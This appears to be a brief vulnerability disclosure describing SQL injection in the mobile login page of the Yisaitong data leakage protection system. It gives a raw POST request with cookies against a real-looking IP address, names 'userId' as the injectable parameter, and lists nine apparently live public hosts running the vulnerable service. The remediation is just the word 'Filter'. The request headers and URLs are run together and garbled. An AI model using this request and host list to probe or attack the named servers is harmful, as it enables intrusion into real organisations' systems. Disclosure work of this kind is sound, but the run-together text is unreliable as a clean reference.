Yisaitong data leakage protection system SQL Injection Vulnerability (no DBA permission required)
SQL Injection exists on the WAP logon page of the DLP System (no DBA permission required)
POST /CDGServer3/3g/LoginAction HTTP/1.1Host: 116.213.171.246Connection: keep-aliveContent-Length: 27Accept: text/html, */*; q=0.01Origin: http://116.213.171.246X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://116.213.171.246/CDGServer3/3g/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=169065F6FC4F3387EF5AFA1C1B958D9F; JSESSIONID=E2BCC89C1BF99CB0D59A2D14886CCBBFuserId=admin&password=admin
UserId
Case:
https://125.89.61.70:8443/CDGServer3/3g/http://223.100.144.160:81/CDGServer3/3g/https://202.170.137.54:8443/CDGServer3/3g/http://218.104.98.22/CDGServer3/3g/https://221.226.213.34:8443/CDGServer3/3g/https://121.18.89.35:8443/CDGServer3/3g/http://116.213.171.246/CDGServer3/3g/http://219.140.62.40/CDGServer3/3g/https://121.12.250.104:8443/CDGServer3/3g/
Solution:
Filter